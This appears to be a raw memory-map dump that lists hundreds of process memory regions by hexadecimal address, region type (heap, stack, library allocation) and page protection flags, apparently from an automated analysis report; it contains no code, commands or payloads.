1FC25631000
|
heap
|
page read and write
|
||
17FCF062000
|
heap
|
page read and write
|
||
266F3068000
|
heap
|
page read and write
|
||
2090AA84000
|
heap
|
page read and write
|
||
1FC252B9000
|
heap
|
page read and write
|
||
17FCF140000
|
heap
|
page read and write
|
||
1CEF3F86000
|
heap
|
page read and write
|
||
1E0E14C0000
|
heap
|
page read and write
|
||
7FFB0B754000
|
unkown
|
page execute and read and write
|
||
1F52B8CD000
|
heap
|
page read and write
|
||
281FC412000
|
heap
|
page read and write
|
||
1FC255D7000
|
heap
|
page read and write
|
||
270D2237000
|
heap
|
page read and write
|
||
1FC25554000
|
heap
|
page read and write
|
||
1FC2561E000
|
heap
|
page read and write
|
||
1C55012B000
|
heap
|
page read and write
|
||
2484A450000
|
heap
|
page read and write
|
||
239FE900000
|
heap
|
page read and write
|
||
266F36AA000
|
heap
|
page read and write
|
||
2484A145000
|
heap
|
page read and write
|
||
1FC24EE2000
|
heap
|
page read and write
|
||
266F36A2000
|
heap
|
page read and write
|
||
270D223A000
|
heap
|
page read and write
|
||
2484A454000
|
heap
|
page read and write
|
||
1E181D00000
|
heap
|
page read and write
|
||
236407E0000
|
heap
|
page read and write
|
||
8F1C1CF000
|
stack
|
page read and write
|
||
1EA2311F000
|
heap
|
page read and write
|
||
1AD18B29000
|
heap
|
page read and write
|
||
1E0E15EE000
|
heap
|
page read and write
|
||
1DD0F2C8000
|
heap
|
page read and write
|
||
1DD0E8A4000
|
heap
|
page read and write
|
||
7FFAA9564000
|
trusted library allocation
|
page read and write
|
||
1E8E4043000
|
heap
|
page read and write
|
||
1E0E1622000
|
heap
|
page read and write
|
||
15766FB000
|
stack
|
page read and write
|
||
9A769FF000
|
stack
|
page read and write
|
||
7FFB0C290000
|
unkown
|
page readonly
|
||
281FC343000
|
heap
|
page read and write
|
||
24545715000
|
heap
|
page read and write
|
||
1C550123000
|
heap
|
page read and write
|
||
24BA3992000
|
heap
|
page read and write
|
||
2484A7E3000
|
heap
|
page read and write
|
||
1FC25652000
|
heap
|
page read and write
|
||
7FFB0BEBD000
|
unkown
|
page execute and read and write
|
||
1C550760000
|
heap
|
page read and write
|
||
1E8E41C5000
|
heap
|
page read and write
|
||
24BA38E0000
|
heap
|
page read and write
|
||
23AC5B41000
|
heap
|
page read and write
|
||
7FFAA96E0000
|
trusted library allocation
|
page read and write
|
||
7FFB0C2B0000
|
unkown
|
page read and write
|
||
7FFAA9640000
|
trusted library allocation
|
page read and write
|
||
1CE587D1000
|
heap
|
page read and write
|
||
2484A15E000
|
heap
|
page read and write
|
||
1CEF20A0000
|
heap
|
page read and write
|
||
2484C18E000
|
heap
|
page read and write
|
||
1FC25562000
|
heap
|
page read and write
|
||
2B52676B000
|
heap
|
page read and write
|
||
76BB8FE000
|
stack
|
page read and write
|
||
1E8E403F000
|
heap
|
page read and write
|
||
7FFB1E47A000
|
unkown
|
page execute and write copy
|
||
23AC5B57000
|
heap
|
page read and write
|
||
2BA9E6E1000
|
heap
|
page read and write
|
||
1FC251B9000
|
heap
|
page read and write
|
||
2422BDE8000
|
heap
|
page read and write
|
||
1E8E3500000
|
trusted library allocation
|
page read and write
|
||
1BCD0F40000
|
heap
|
page read and write
|
||
1EA2312C000
|
heap
|
page read and write
|
||
7FFB0C290000
|
unkown
|
page readonly
|
||
1700B89D000
|
heap
|
page read and write
|
||
7FFAA95D0000
|
trusted library allocation
|
page read and write
|
||
1FC2531C000
|
heap
|
page read and write
|
||
266F36CF000
|
heap
|
page read and write
|
||
135F06E0000
|
heap
|
page read and write
|
||
1DEE7CB4000
|
heap
|
page read and write
|
||
270D4056000
|
heap
|
page read and write
|
||
1FC253B0000
|
heap
|
page read and write
|
||
270D27A7000
|
heap
|
page read and write
|
||
239FEA57000
|
heap
|
page read and write
|
||
2940C320000
|
heap
|
page read and write
|
||
266F4F5F000
|
heap
|
page read and write
|
||
1FC25675000
|
heap
|
page read and write
|
||
1C550111000
|
heap
|
page read and write
|
||
266F3047000
|
heap
|
page read and write
|
||
7FFB0C2B0000
|
unkown
|
page read and write
|
||
165335E0000
|
heap
|
page read and write
|
||
267C163B000
|
heap
|
page read and write
|
||
244EE0C7000
|
heap
|
page read and write
|
||
16533605000
|
heap
|
page read and write
|
||
281FC513000
|
heap
|
page read and write
|
||
270D2450000
|
heap
|
page read and write
|
||
1E8E352F000
|
trusted library allocation
|
page read and write
|
||
2BA9E6D9000
|
heap
|
page read and write
|
||
267A7900000
|
heap
|
page read and write
|
||
1FC253B0000
|
heap
|
page read and write
|
||
1E0D646C000
|
heap
|
page read and write
|
||
1FC2540D000
|
heap
|
page read and write
|
||
239FE915000
|
heap
|
page read and write
|
||
7FFB0C2B0000
|
unkown
|
page read and write
|
||
1FC25558000
|
heap
|
page read and write
|
||
1FC25601000
|
heap
|
page read and write
|
||
2484A7FA000
|
heap
|
page read and write
|
||
7FFAA96A4000
|
trusted library allocation
|
page read and write
|
||
281FC517000
|
heap
|
page read and write
|
||
1FC2532D000
|
heap
|
page read and write
|
||
1FC24E98000
|
heap
|
page read and write
|
||
1909D515000
|
heap
|
page read and write
|
||
D7414E8000
|
stack
|
page read and write
|
||
1A2CE3D0000
|
heap
|
page read and write
|
||
2484C184000
|
heap
|
page read and write
|
||
7E41E8C000
|
stack
|
page read and write
|
||
1E0E15BA000
|
heap
|
page read and write
|
||
27EA9B60000
|
heap
|
page read and write
|
||
281FC409000
|
heap
|
page read and write
|
||
B2B85BE000
|
stack
|
page read and write
|
||
7FFB0C43D000
|
unkown
|
page read and write
|
||
1CEF2053000
|
heap
|
page read and write
|
||
7FFB0C401000
|
unkown
|
page execute and write copy
|
||
D7415FE000
|
stack
|
page read and write
|
||
1DCE30DB000
|
heap
|
page read and write
|
||
1E8E3525000
|
trusted library allocation
|
page read and write
|
||
7FFB0C2A6000
|
unkown
|
page readonly
|
||
24BA3992000
|
heap
|
page read and write
|
||
24BA398A000
|
heap
|
page read and write
|
||
7FFB0D742000
|
unkown
|
page readonly
|
||
7FFAA9770000
|
trusted library allocation
|
page execute and read and write
|
||
267B9573000
|
trusted library allocation
|
page read and write
|
||
7DF416EF0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAA9750000
|
trusted library allocation
|
page read and write
|
||
1FC256BE000
|
heap
|
page read and write
|
||
2484A170000
|
heap
|
page read and write
|
||
2422BDF8000
|
heap
|
page read and write
|
||
24BA3992000
|
heap
|
page read and write
|
||
19BC6795000
|
heap
|
page read and write
|
||
2322B380000
|
heap
|
page read and write
|
||
270D2209000
|
heap
|
page read and write
|
||
7FFB1E470000
|
unkown
|
page readonly
|
||
7FFAA9670000
|
trusted library allocation
|
page read and write
|
||
270D2238000
|
heap
|
page read and write
|
||
1C550765000
|
heap
|
page read and write
|
||
D7417FD000
|
stack
|
page read and write
|
||
1FC25337000
|
heap
|
page read and write
|
||
1E0E15B4000
|
heap
|
page read and write
|
||
266F3170000
|
heap
|
page read and write
|
||
7FFB0C291000
|
unkown
|
page execute read
|
||
2484A090000
|
heap
|
page read and write
|
||
1FC252EB000
|
heap
|
page read and write
|
||
2484A169000
|
heap
|
page read and write
|
||
21B1BD20000
|
heap
|
page read and write
|
||
28425E5D000
|
heap
|
page read and write
|
||
239E7EDA000
|
trusted library allocation
|
page read and write
|
||
23AC60FA000
|
heap
|
page read and write
|
||
281FC316000
|
heap
|
page read and write
|
||
76BB2FE000
|
stack
|
page read and write
|
||
27EA9BB5000
|
heap
|
page read and write
|
||
2422BDE0000
|
heap
|
page read and write
|
||
1FC255C7000
|
heap
|
page read and write
|
||
7FFAA9384000
|
trusted library allocation
|
page read and write
|
||
1FC2533A000
|
heap
|
page read and write
|
||
1E181CE0000
|
heap
|
page read and write
|
||
1C550062000
|
heap
|
page read and write
|
||
1FC25451000
|
heap
|
page read and write
|
||
1E8E3FFB000
|
heap
|
page read and write
|
||
267A7798000
|
heap
|
page read and write
|
||
23AC5B41000
|
heap
|
page read and write
|
||
1FC2555E000
|
heap
|
page read and write
|
||
1407C7A9000
|
trusted library allocation
|
page read and write
|
||
1BCD1060000
|
heap
|
page read and write
|
||
270D27BF000
|
heap
|
page read and write
|
||
1CEF2097000
|
heap
|
page read and write
|
||
1E8E3FEB000
|
heap
|
page read and write
|
||
7FFB0D740000
|
unkown
|
page read and write
|
||
1FC24EE2000
|
heap
|
page read and write
|
||
7FF74EF16000
|
unkown
|
page read and write
|
||
2422BDF8000
|
heap
|
page read and write
|
||
1FC25616000
|
heap
|
page read and write
|
||
1E0D6465000
|
heap
|
page read and write
|
||
1FC2536A000
|
heap
|
page read and write
|
||
1407C180000
|
trusted library section
|
page readonly
|
||
23AC5B02000
|
heap
|
page read and write
|
||
1407B27D000
|
heap
|
page read and write
|
||
1FC25602000
|
heap
|
page read and write
|
||
1FC25656000
|
heap
|
page read and write
|
||
7FFB0BB66000
|
unkown
|
page execute and write copy
|
||
1E8E3525000
|
trusted library allocation
|
page read and write
|
||
266F320B000
|
heap
|
page read and write
|
||
20C72EC4000
|
heap
|
page read and write
|
||
2322B430000
|
heap
|
page read and write
|
||
23AC60F0000
|
heap
|
page read and write
|
||
4B74EFE000
|
unkown
|
page read and write
|
||
7FFB0C290000
|
unkown
|
page readonly
|
||
1FC24F2D000
|
heap
|
page read and write
|
||
1FC2567E000
|
heap
|
page read and write
|
||
7FFAA93A0000
|
trusted library allocation
|
page read and write
|
||
7FFAA97A0000
|
trusted library allocation
|
page read and write
|
||
23AC60F5000
|
heap
|
page read and write
|
||
1EA2311F000
|
heap
|
page read and write
|
||
281FC3F8000
|
heap
|
page read and write
|
||
2322B410000
|
heap
|
page read and write
|
||
7FFAA9520000
|
trusted library allocation
|
page read and write
|
||
1C55077C000
|
heap
|
page read and write
|
||
1407C740000
|
trusted library allocation
|
page read and write
|
||
267C1904000
|
heap
|
page read and write
|
||
1CEF2085000
|
heap
|
page read and write
|
||
1FC253B0000
|
heap
|
page read and write
|
||
281FC412000
|
heap
|
page read and write
|
||
239FEA4D000
|
heap
|
page read and write
|
||
2484A7E5000
|
heap
|
page read and write
|
||
2484A16A000
|
heap
|
page read and write
|
||
1DD0FA93000
|
heap
|
page read and write
|
||
2090A7F0000
|
heap
|
page read and write
|
||
1407B170000
|
heap
|
page read and write
|
||
1FC22D29000
|
heap
|
page read and write
|
||
1A2CE2D0000
|
heap
|
page read and write
|
||
2484A157000
|
heap
|
page read and write
|
||
239E47F0000
|
heap
|
page read and write
|
||
2CFD1BE000
|
stack
|
page read and write
|
||
266F36E5000
|
heap
|
page read and write
|
||
1E0D645D000
|
heap
|
page read and write
|
||
23DC40E0000
|
heap
|
page read and write
|
||
239E498C000
|
heap
|
page read and write
|
||
1FC25327000
|
heap
|
page read and write
|
||
20D43B0B000
|
heap
|
page read and write
|
||
51D4878000
|
stack
|
page read and write
|
||
1DD0C760000
|
heap
|
page read and write
|
||
1FC25554000
|
heap
|
page read and write
|
||
1E0E1583000
|
heap
|
page read and write
|
||
1FC25631000
|
heap
|
page read and write
|
||
1576EFE000
|
unkown
|
page readonly
|
||
1FC255B2000
|
heap
|
page read and write
|
||
1DD0C7C4000
|
heap
|
page read and write
|
||
1E8E4056000
|
heap
|
page read and write
|
||
1E8E41E0000
|
heap
|
page read and write
|
||
281FC331000
|
heap
|
page read and write
|
||
1DD0FAA0000
|
heap
|
page read and write
|
||
7FFAA95B0000
|
trusted library allocation
|
page read and write
|
||
1FC2564F000
|
heap
|
page read and write
|
||
1EA2311C000
|
heap
|
page read and write
|
||
266F30A2000
|
heap
|
page read and write
|
||
7FFB0D720000
|
unkown
|
page readonly
|
||
239E48A6000
|
heap
|
page read and write
|
||
1FC24F55000
|
heap
|
page read and write
|
||
244EE040000
|
heap
|
page read and write
|
||
281FC270000
|
trusted library allocation
|
page read and write
|
||
1FC24F6A000
|
heap
|
page read and write
|
||
7FFAA96A0000
|
trusted library allocation
|
page read and write
|
||
7FF6DC700000
|
unkown
|
page readonly
|
||
1CB96E20000
|
heap
|
page read and write
|
||
1FC2564C000
|
heap
|
page read and write
|
||
2B526760000
|
heap
|
page read and write
|
||
1CEF2687000
|
heap
|
page read and write
|
||
23AC5B66000
|
heap
|
page read and write
|
||
266F36E7000
|
heap
|
page read and write
|
||
1CEF25A0000
|
heap
|
page read and write
|
||
266F36DF000
|
heap
|
page read and write
|
||
1E8E403F000
|
heap
|
page read and write
|
||
1EA2311F000
|
heap
|
page read and write
|
||
1E8E4043000
|
heap
|
page read and write
|
||
1CEF20B9000
|
heap
|
page read and write
|
||
1E5FA670000
|
heap
|
page read and write
|
||
1EA2311F000
|
heap
|
page read and write
|
||
1FC2533A000
|
heap
|
page read and write
|
||
19BC6521000
|
heap
|
page read and write
|
||
1DD0FA93000
|
heap
|
page read and write
|
||
23AC6108000
|
heap
|
page read and write
|
||
1DEE7CBB000
|
heap
|
page read and write
|
||
23097CC0000
|
heap
|
page read and write
|
||
1E181C40000
|
heap
|
page read and write
|
||
20D43AFC000
|
heap
|
page read and write
|
||
236408C7000
|
heap
|
page read and write
|
||
266F36CF000
|
heap
|
page read and write
|
||
281FC3EC000
|
heap
|
page read and write
|
||
24BA397D000
|
heap
|
page read and write
|
||
26A1C3C0000
|
heap
|
page read and write
|
||
1E8E4047000
|
heap
|
page read and write
|
||
7FFB0C350000
|
unkown
|
page readonly
|
||
270D227C000
|
heap
|
page read and write
|
||
1DD0C7C3000
|
heap
|
page read and write
|
||
2484A144000
|
heap
|
page read and write
|
||
7FFB1BB24000
|
unkown
|
page execute and read and write
|
||
266F3083000
|
heap
|
page read and write
|
||
1E8E3525000
|
trusted library allocation
|
page read and write
|
||
2484A7EC000
|
heap
|
page read and write
|
||
23AC79ED000
|
heap
|
page read and write
|
||
1FC25556000
|
heap
|
page read and write
|
||
236408A5000
|
heap
|
page read and write
|
||
7FFAA97C0000
|
trusted library allocation
|
page read and write
|
||
1FC25D27000
|
heap
|
page read and write
|
||
1FC25652000
|
heap
|
page read and write
|
||
1E0E1583000
|
heap
|
page read and write
|
||
7FFB0C291000
|
unkown
|
page execute read
|
||
2484A805000
|
heap
|
page read and write
|
||
202E5760000
|
heap
|
page read and write
|
||
281FC3F8000
|
heap
|
page read and write
|
||
15774FE000
|
stack
|
page read and write
|
||
8BBB8FC000
|
stack
|
page read and write
|
||
1C5500B0000
|
heap
|
page read and write
|
||
2364087F000
|
heap
|
page read and write
|
||
1E8E3525000
|
trusted library allocation
|
page read and write
|
||
1E8E34FE000
|
trusted library allocation
|
page read and write
|
||
1577AFE000
|
unkown
|
page readonly
|
||
1E8E4052000
|
heap
|
page read and write
|
||
267AA627000
|
trusted library allocation
|
page read and write
|
||
1FC25616000
|
heap
|
page read and write
|
||
1FC25646000
|
heap
|
page read and write
|
||
23DC3E72000
|
heap
|
page read and write
|
||
1FC22D89000
|
heap
|
page read and write
|
||
7FFB0C290000
|
unkown
|
page readonly
|
||
7FFB1E4C9000
|
unkown
|
page execute and read and write
|
||
281FC324000
|
heap
|
page read and write
|
||
28425E5E000
|
heap
|
page read and write
|
||
27E84CF9000
|
heap
|
page read and write
|
||
9A7652C000
|
stack
|
page read and write
|
||
1FC256CC000
|
heap
|
page read and write
|
||
1AD18B29000
|
heap
|
page read and write
|
||
2484C170000
|
heap
|
page read and write
|
||
1E0E2FB1000
|
heap
|
page read and write
|
||
1CEF209E000
|
heap
|
page read and write
|
||
2484A802000
|
heap
|
page read and write
|
||
7E7A67F000
|
stack
|
page read and write
|
||
1407B190000
|
heap
|
page read and write
|
||
266F3097000
|
heap
|
page read and write
|
||
1407B302000
|
heap
|
page read and write
|
||
2484A15E000
|
heap
|
page read and write
|
||
266F4F55000
|
heap
|
page read and write
|
||
281FC34E000
|
heap
|
page read and write
|
||
1FC252A2000
|
heap
|
page read and write
|
||
1C550180000
|
heap
|
page read and write
|
||
1FC25B6C000
|
direct allocation
|
page read and write
|
||
29AC2460000
|
heap
|
page read and write
|
||
270D2224000
|
heap
|
page read and write
|
||
1C55079C000
|
heap
|
page read and write
|
||
1DD0FAC8000
|
heap
|
page read and write
|
||
270D2249000
|
heap
|
page read and write
|
||
23AC6112000
|
heap
|
page read and write
|
||
1DEE7CBE000
|
heap
|
page read and write
|
||
7FFAA9590000
|
trusted library allocation
|
page read and write
|
||
1407BB00000
|
heap
|
page read and write
|
||
1CEF3F70000
|
heap
|
page read and write
|
||
1E8E3FF1000
|
heap
|
page read and write
|
||
281FC3F4000
|
heap
|
page read and write
|
||
1E0D6465000
|
heap
|
page read and write
|
||
27EA9A82000
|
heap
|
page read and write
|
||
26379E71000
|
heap
|
page read and write
|
||
1909D514000
|
heap
|
page read and write
|
||
1FC25332000
|
heap
|
page read and write
|
||
1FC25670000
|
heap
|
page read and write
|
||
1FC25641000
|
heap
|
page read and write
|
||
1E0E17E4000
|
heap
|
page read and write
|
||
1FC22D69000
|
heap
|
page read and write
|
||
1E5FA782000
|
heap
|
page read and write
|
||
1FC255D0000
|
heap
|
page read and write
|
||
23AC5B5C000
|
heap
|
page read and write
|
||
266F36BC000
|
heap
|
page read and write
|
||
7FFB0C5E8000
|
unkown
|
page execute and read and write
|
||
1EA2311F000
|
heap
|
page read and write
|
||
19DD4FF0000
|
heap
|
page read and write
|
||
1E4CF9E6000
|
heap
|
page read and write
|
||
E6BFCFC000
|
stack
|
page read and write
|
||
1C5500B8000
|
heap
|
page read and write
|
||
1E181D00000
|
heap
|
page read and write
|
||
1E8E3FFC000
|
heap
|
page read and write
|
||
1EA2311F000
|
heap
|
page read and write
|
||
1C550764000
|
heap
|
page read and write
|
||
1FC2559E000
|
heap
|
page read and write
|
||
2484A804000
|
heap
|
page read and write
|
||
27EA9A82000
|
heap
|
page read and write
|
||
1407CA90000
|
trusted library allocation
|
page read and write
|
||
7FFB0C290000
|
unkown
|
page readonly
|
||
1EA24AA0000
|
heap
|
page read and write
|
||
239FE7B9000
|
heap
|
page read and write
|
||
81CE07F000
|
stack
|
page read and write
|
||
7FFB0C2A6000
|
unkown
|
page readonly
|
||
1FC25686000
|
heap
|
page read and write
|
||
281FE17E000
|
heap
|
page read and write
|
||
20D43B06000
|
heap
|
page read and write
|
||
81CDE77000
|
stack
|
page read and write
|
||
1E8E3525000
|
trusted library allocation
|
page read and write
|
||
7FFAA9436000
|
trusted library allocation
|
page execute and read and write
|
||
7FFB0C2B5000
|
unkown
|
page readonly
|
||
1FC25652000
|
heap
|
page read and write
|
||
267A7754000
|
heap
|
page read and write
|
||
1CE587D1000
|
heap
|
page read and write
|
||
1AB5E520000
|
heap
|
page read and write
|
||
281FC358000
|
heap
|
page read and write
|
||
23AC5B6D000
|
heap
|
page read and write
|
||
2584DBF0000
|
heap
|
page read and write
|
||
23AC79E2000
|
heap
|
page read and write
|
||
1FC256A7000
|
heap
|
page read and write
|
||
7FF74EEF8000
|
unkown
|
page write copy
|
||
2637A020000
|
heap
|
page read and write
|
||
2484A0A0000
|
heap
|
page read and write
|
||
15769FE000
|
unkown
|
page readonly
|
||
135F0601000
|
heap
|
page read and write
|
||
1690F754000
|
heap
|
page read and write
|
||
1FC251C7000
|
heap
|
page read and write
|
||
7FFB0C2B5000
|
unkown
|
page readonly
|
||
1C550799000
|
heap
|
page read and write
|
||
23195F10000
|
heap
|
page read and write
|
||
1E8E3518000
|
trusted library allocation
|
page read and write
|
||
76F4B0C000
|
stack
|
page read and write
|
||
7FFB0C291000
|
unkown
|
page execute read
|
||
9F33CFF000
|
stack
|
page read and write
|
||
2484C180000
|
heap
|
page read and write
|
||
23AC7B50000
|
heap
|
page read and write
|
||
23097D20000
|
heap
|
page read and write
|
||
CDBDCFF000
|
stack
|
page read and write
|
||
239E49D0000
|
trusted library allocation
|
page read and write
|
||
1FC2531B000
|
heap
|
page read and write
|
||
1DCE30F2000
|
heap
|
page read and write
|
||
23195FBD000
|
heap
|
page read and write
|
||
1DD0C80A000
|
heap
|
page read and write
|
||
2484A16A000
|
heap
|
page read and write
|
||
26395BB0000
|
heap
|
page read and write
|
||
1DEE7F40000
|
heap
|
page read and write
|
||
CDBDDFE000
|
stack
|
page read and write
|
||
1C55076A000
|
heap
|
page read and write
|
||
1FC22D3E000
|
heap
|
page read and write
|
||
1E0E1490000
|
heap
|
page read and write
|
||
23AC5AF0000
|
heap
|
page read and write
|
||
7FFB24ACE000
|
unkown
|
page read and write
|
||
1FC255A2000
|
heap
|
page read and write
|
||
7E7A6FF000
|
stack
|
page read and write
|
||
21B1BDA1000
|
heap
|
page read and write
|
||
1E0D6458000
|
heap
|
page read and write
|
||
E6C17FF000
|
stack
|
page read and write
|
||
23AC5AA0000
|
heap
|
page read and write
|
||
239E4A20000
|
heap
|
page read and write
|
||
1FC25E2D000
|
heap
|
page read and write
|
||
135F0800000
|
heap
|
page read and write
|
||
239E8424000
|
trusted library allocation
|
page read and write
|
||
7FFB0C2B5000
|
unkown
|
page readonly
|
||
1DD10500000
|
heap
|
page read and write
|
||
1FC25337000
|
heap
|
page read and write
|
||
D7414F4000
|
stack
|
page read and write
|
||
239E49B0000
|
trusted library allocation
|
page read and write
|
||
7FFAA9522000
|
trusted library allocation
|
page read and write
|
||
23195FD2000
|
heap
|
page read and write
|
||
2B526930000
|
heap
|
page read and write
|
||
19BC64F0000
|
heap
|
page read and write
|
||
1FC255F2000
|
heap
|
page read and write
|
||
1E0E15FD000
|
heap
|
page read and write
|
||
1C5500D2000
|
heap
|
page read and write
|
||
23AC60F4000
|
heap
|
page read and write
|
||
1FC256A5000
|
heap
|
page read and write
|
||
1FC25560000
|
heap
|
page read and write
|
||
7FF6DC700000
|
unkown
|
page readonly
|
||
1FC255D0000
|
heap
|
page read and write
|
||
9A8657E000
|
stack
|
page read and write
|
||
1FC25333000
|
heap
|
page read and write
|
||
239FE7E2000
|
heap
|
page read and write
|
||
267A7700000
|
trusted library allocation
|
page read and write
|
||
239E80DB000
|
trusted library allocation
|
page read and write
|
||
81D27FE000
|
stack
|
page read and write
|
||
22972EAB000
|
heap
|
page read and write
|
||
266F36E9000
|
heap
|
page read and write
|
||
1E0E15E5000
|
heap
|
page read and write
|
||
270D27B5000
|
heap
|
page read and write
|
||
20D43B0E000
|
heap
|
page read and write
|
||
1E0E15BA000
|
heap
|
page read and write
|
||
1E8E3518000
|
trusted library allocation
|
page read and write
|
||
1B3A8230000
|
heap
|
page read and write
|
||
1E8E352F000
|
trusted library allocation
|
page read and write
|
||
1E8E4056000
|
heap
|
page read and write
|
||
9A768FF000
|
unkown
|
page read and write
|
||
1E5FA782000
|
heap
|
page read and write
|
||
266F306A000
|
heap
|
page read and write
|
||
1C5507A7000
|
heap
|
page read and write
|
||
19BC6500000
|
heap
|
page read and write
|
||
1FC24F50000
|
heap
|
page read and write
|
||
1FC2527D000
|
heap
|
page read and write
|
||
1DD0C80A000
|
heap
|
page read and write
|
||
270D218A000
|
heap
|
page read and write
|
||
2484A45E000
|
heap
|
page read and write
|
||
281FC409000
|
heap
|
page read and write
|
||
1AB5E1D0000
|
heap
|
page read and write
|
||
27EA9B80000
|
heap
|
page read and write
|
||
281FC3EE000
|
heap
|
page read and write
|
||
1C5500BC000
|
heap
|
page read and write
|
||
1690F75E000
|
heap
|
page read and write
|
||
CDBD977000
|
stack
|
page read and write
|
||
1C550119000
|
heap
|
page read and write
|
||
1407BB13000
|
heap
|
page read and write
|
||
51D45FE000
|
stack
|
page read and write
|
||
281FC333000
|
heap
|
page read and write
|
||
1FC25626000
|
heap
|
page read and write
|
||
73D26FF000
|
stack
|
page read and write
|
||
21B1BD8A000
|
heap
|
page read and write
|
||
1FC26120000
|
heap
|
page read and write
|
||
1FC25563000
|
heap
|
page read and write
|
||
7FF74EE70000
|
unkown
|
page readonly
|
||
1E8E41D4000
|
heap
|
page read and write
|
||
19BC66F0000
|
heap
|
page read and write
|
||
1CEF20A4000
|
heap
|
page read and write
|
||
1E8E4047000
|
heap
|
page read and write
|
||
1E8E41D7000
|
heap
|
page read and write
|
||
1FC25631000
|
heap
|
page read and write
|
||
1CEF20B7000
|
heap
|
page read and write
|
||
2CFCDDE000
|
stack
|
page read and write
|
||
270D2224000
|
heap
|
page read and write
|
||
7FFAA9354000
|
trusted library allocation
|
page read and write
|
||
1FC252B9000
|
heap
|
page read and write
|
||
7FFB1C3B0000
|
unkown
|
page readonly
|
||
1CEF1F70000
|
heap
|
page read and write
|
||
51D48FE000
|
stack
|
page read and write
|
||
15C999C0000
|
heap
|
page read and write
|
||
266F30AD000
|
heap
|
page read and write
|
||
26379D90000
|
heap
|
page read and write
|
||
267AA616000
|
trusted library allocation
|
page read and write
|
||
886BFFF000
|
unkown
|
page read and write
|
||
1DEE7CAD000
|
heap
|
page read and write
|
||
281FC270000
|
trusted library allocation
|
page read and write
|
||
15777F9000
|
stack
|
page read and write
|
||
7FFB0C5EB000
|
unkown
|
page read and write
|
||
24B86AB0000
|
heap
|
page read and write
|
||
81CE17F000
|
stack
|
page read and write
|
||
267A76E0000
|
trusted library section
|
page read and write
|
||
1CEF20A8000
|
heap
|
page read and write
|
||
B2B88FE000
|
stack
|
page read and write
|
||
1FC25320000
|
heap
|
page read and write
|
||
7FFB0C3FE000
|
unkown
|
page execute and read and write
|
||
1E4CFA0F000
|
heap
|
page read and write
|
||
1FC22C90000
|
heap
|
page read and write
|
||
1CEF25AF000
|
heap
|
page read and write
|
||
1E0D6477000
|
heap
|
page read and write
|
||
1E0E1530000
|
heap
|
page read and write
|
||
2484A100000
|
heap
|
page read and write
|
||
7FFB18B7E000
|
unkown
|
page execute and read and write
|
||
270D2140000
|
trusted library allocation
|
page read and write
|
||
1AB5E250000
|
heap
|
page read and write
|
||
23AC60FA000
|
heap
|
page read and write
|
||
1AB5E524000
|
heap
|
page read and write
|
||
1E0D9B80000
|
direct allocation
|
page read and write
|
||
281FC51A000
|
heap
|
page read and write
|
||
1909D510000
|
heap
|
page read and write
|
||
270D4040000
|
heap
|
page read and write
|
||
1E0E155D000
|
heap
|
page read and write
|
||
1FC2577A000
|
heap
|
page read and write
|
||
1E0E1626000
|
heap
|
page read and write
|
||
7FFAA943C000
|
trusted library allocation
|
page execute and read and write
|
||
51D447E000
|
stack
|
page read and write
|
||
2940C604000
|
heap
|
page read and write
|
||
2BA38B21000
|
heap
|
page read and write
|
||
2BA9E644000
|
heap
|
page read and write
|
||
7FF6DC73E000
|
unkown
|
page write copy
|
||
1E0D6410000
|
heap
|
page read and write
|
||
1E0E1601000
|
heap
|
page read and write
|
||
281FC35D000
|
heap
|
page read and write
|
||
267C1790000
|
heap
|
page read and write
|
||
7FFAA95C0000
|
trusted library allocation
|
page read and write
|
||
236408A0000
|
heap
|
page read and write
|
||
608A0FF000
|
stack
|
page read and write
|
||
266F36C1000
|
heap
|
page read and write
|
||
1FC24F55000
|
heap
|
page read and write
|
||
1DD0E99E000
|
heap
|
page read and write
|
||
1CEF2076000
|
heap
|
page read and write
|
||
2DE1CC0A000
|
heap
|
page read and write
|
||
1CE587D1000
|
heap
|
page read and write
|
||
1C550119000
|
heap
|
page read and write
|
||
1AD18B31000
|
heap
|
page read and write
|
||
1DD0FAB4000
|
heap
|
page read and write
|
||
1FC24F4E000
|
heap
|
page read and write
|
||
1FC25680000
|
heap
|
page read and write
|
||
23AC79E6000
|
heap
|
page read and write
|
||
245456D0000
|
heap
|
page read and write
|
||
9E61FE000
|
stack
|
page read and write
|
||
7FF6DC73E000
|
unkown
|
page read and write
|
||
8F950FC000
|
stack
|
page read and write
|
||
1690F726000
|
heap
|
page read and write
|
||
1E182090000
|
heap
|
page read and write
|
||
7FFB18B70000
|
unkown
|
page readonly
|
||
1FC25368000
|
heap
|
page read and write
|
||
19BC6521000
|
heap
|
page read and write
|
||
267A95DF000
|
trusted library allocation
|
page read and write
|
||
73D27FF000
|
stack
|
page read and write
|
||
28425DD4000
|
heap
|
page read and write
|
||
F516CFF000
|
stack
|
page read and write
|
||
CC92DFB000
|
stack
|
page read and write
|
||
1AD18A94000
|
heap
|
page read and write
|
||
7FFB0BABD000
|
unkown
|
page execute and read and write
|
||
1E0D9B40000
|
direct allocation
|
page read and write
|
||
270D2187000
|
heap
|
page read and write
|
||
1407C170000
|
trusted library section
|
page readonly
|
||
1E0E15D0000
|
heap
|
page read and write
|
||
7FF74EF18000
|
unkown
|
page readonly
|
||
13C87870000
|
heap
|
page read and write
|
||
1E0E1571000
|
heap
|
page read and write
|
||
267AA95A000
|
trusted library allocation
|
page read and write
|
||
1E0D645B000
|
heap
|
page read and write
|
||
1CEF1E90000
|
heap
|
page read and write
|
||
23640850000
|
heap
|
page read and write
|
||
1AD189A0000
|
heap
|
page read and write
|
||
1DD0C80A000
|
heap
|
page read and write
|
||
1FC22D40000
|
heap
|
page read and write
|
||
1E0E17E0000
|
heap
|
page read and write
|
||
2422BE00000
|
heap
|
page read and write
|
||
2584DAD8000
|
heap
|
page read and write
|
||
1E0E1624000
|
heap
|
page read and write
|
||
270D220F000
|
heap
|
page read and write
|
||
23AC60FE000
|
heap
|
page read and write
|
||
1CEF2092000
|
heap
|
page read and write
|
||
7FFB0C2B0000
|
unkown
|
page read and write
|
||
267AA9EE000
|
trusted library allocation
|
page read and write
|
||
15779FB000
|
stack
|
page read and write
|
||
1CEF2049000
|
heap
|
page read and write
|
||
1FC24EE6000
|
heap
|
page read and write
|
||
1CB96DC0000
|
heap
|
page read and write
|
||
2940C327000
|
heap
|
page read and write
|
||
1FC255C2000
|
heap
|
page read and write
|
||
267AA41A000
|
trusted library allocation
|
page read and write
|
||
2584DAE0000
|
heap
|
page read and write
|
||
267A7960000
|
heap
|
page read and write
|
||
1DD0C75E000
|
heap
|
page read and write
|
||
266F3075000
|
heap
|
page read and write
|
||
236408C7000
|
heap
|
page read and write
|
||
1A2CE4F0000
|
heap
|
page read and write
